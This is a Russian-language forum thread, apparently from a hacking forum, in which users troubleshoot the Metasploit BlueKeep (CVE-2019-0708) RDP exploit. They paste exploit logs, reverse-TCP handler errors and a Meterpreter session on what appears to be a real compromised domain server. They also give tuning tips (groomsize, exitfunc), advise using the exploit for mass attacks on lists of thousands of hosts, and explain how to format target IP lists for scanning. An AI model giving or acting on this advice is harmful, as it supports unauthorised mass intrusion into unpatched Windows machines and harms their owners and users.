а еще проще через services/vulns..Можно попробовать отсортировать по одинаковым портам в разные документы и сканить IPы на каждый из этих портов , но я думаю такое прокатит если у вас их там не десятки, чтобы не мучаться
а еще проще через services/vulns..Можно попробовать отсортировать по одинаковым портам в разные документы и сканить IPы на каждый из этих портов , но я думаю такое прокатит если у вас их там не десятки, чтобы не мучаться
Багов там нет с подключением файла с ip. Кушает файл с ипами через пробел в одну строку отлично. Это что то на твоей стороне.Может правда проблема с metasploit и ждать обновы исправления
запускается без ошибок, находит [+] а сессий нет в хендлере, что может быть не так?через какое то время в хендлер полетят сесии
Computer : V-RDS-01 OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1). Architecture : x64 System Language : en_GB Domain : BROWNHILLS Logged On Users : 41 Meterpreter : x64/windows
sessions набери и отобразяться у тебя сессиизапускается без ошибок, находит [+] а сессий нет в хендлере, что может быть не так?
Читайте начало статьи, реализация этого CVE в мете никак не подойдет для точечной атаки, только для массовыхПодскажите, в чем может быть проблема, все виртуалки Win 7 (no update) Win server 2008 отлетают при запуске эксплойта в синий экран смерти и идут на перезагрузку, с Win 7 (last update) ничего не происходит, но лог в мете один и тот же:
[*] 192.168.1.90:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.1.90:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. (Этой строчки нет при запуски сплойта на винде 7 с последней обновой, но я так понимаю, что это потому что пофикшено)
[*] 192.168.1.90:3389 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.90:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa8009c00000, Channel count 1.
[!] 192.168.1.90:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.90:3389 - Surfing channels ...
[*] 192.168.1.90:3389 - Lobbing eggs ...
[*] 192.168.1.90:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.1.90:3389 - <---------------- | Leaving Danger Zone | ---------------->
В Хендлер ничего не стучит, после запуска хендлера просто строка
[*] Started reverse TCP handler on 192.168.1.133:4444
Пейлоады там и там одинаковые лхост лпорт и пасс тоже совпадают.
Еще некоторые проблемы при запуске некоторых эксплойтов вылетает такой лог
[-] Handler failed to bind to 192.168.1.133:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] 192.168.1.183:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
Первое почему не стучит попробуй set groomsize 250 или поиграть с ними, потом поставь в exitfunc process в некоторых машинах помогалПодскажите, в чем может быть проблема, все виртуалки Win 7 (no update) Win server 2008 отлетают при запуске эксплойта в синий экран смерти и идут на перезагрузку, с Win 7 (last update) ничего не происходит, но лог в мете один и тот же:
[*] 192.168.1.90:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.1.90:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel. (Этой строчки нет при запуски сплойта на винде 7 с последней обновой, но я так понимаю, что это потому что пофикшено)
[*] 192.168.1.90:3389 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.1.90:3389 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa8009c00000, Channel count 1.
[!] 192.168.1.90:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.90:3389 - Surfing channels ...
[*] 192.168.1.90:3389 - Lobbing eggs ...
[*] 192.168.1.90:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.1.90:3389 - <---------------- | Leaving Danger Zone | ---------------->
В Хендлер ничего не стучит, после запуска хендлера просто строка
[*] Started reverse TCP handler on 192.168.1.133:4444
Пейлоады там и там одинаковые лхост лпорт и пасс тоже совпадают.
Еще некоторые проблемы при запуске некоторых эксплойтов вылетает такой лог
[-] Handler failed to bind to 192.168.1.133:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] 192.168.1.183:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
это связано именнно с нестабильностью эксплойта? Условна говоря загрузишь лист на 10000 пк, где-то да выстрелит? За линк благодарюЧитайте начало статьи, реализация этого CVE в мете никак не подойдет для точечной атаки, только для массовых
если хочешь поиграть с точечными атаками на свои виртуалки почитай вот тут
xttps://pentest-tools.com/blog/bluekeep-exploit-metasploit/
groomsize менял от 1 до 300 с шагом 50, с exitfunc тоже игралсяПервое почему не стучит попробуй set groomsize 250 или поиграть с ними, потом поставь в exitfunc process в некоторых машинах помогал
Второе у тебя написано Exploit failed [bad-config] проблема с options проверь настройки и поменяй порты и запусти точечно все работает
This exploit is unstable. It's work with mass attack, not individual PCwhat might be the problem? i tried diffrent hosts, targets, force exploit
Посмотреть вложение 16402
Ну а тебя самого запятые в логе адреса не смущают?))) Пиши в строчку через пробелЕсли список засовываю в рдпскан в виде
ip,
ip,
ip,
имею такую ошибку
Посмотреть вложение 16447
Если же без запятых
ip
ip
ip
последнее число куда-то уходит
Посмотреть вложение 16448
какого ввида список должен быть?
В одну строку если через запятую, то все ок.Ну а тебя самого запятые в логе адреса не смущают?))) Пиши в строчку через пробел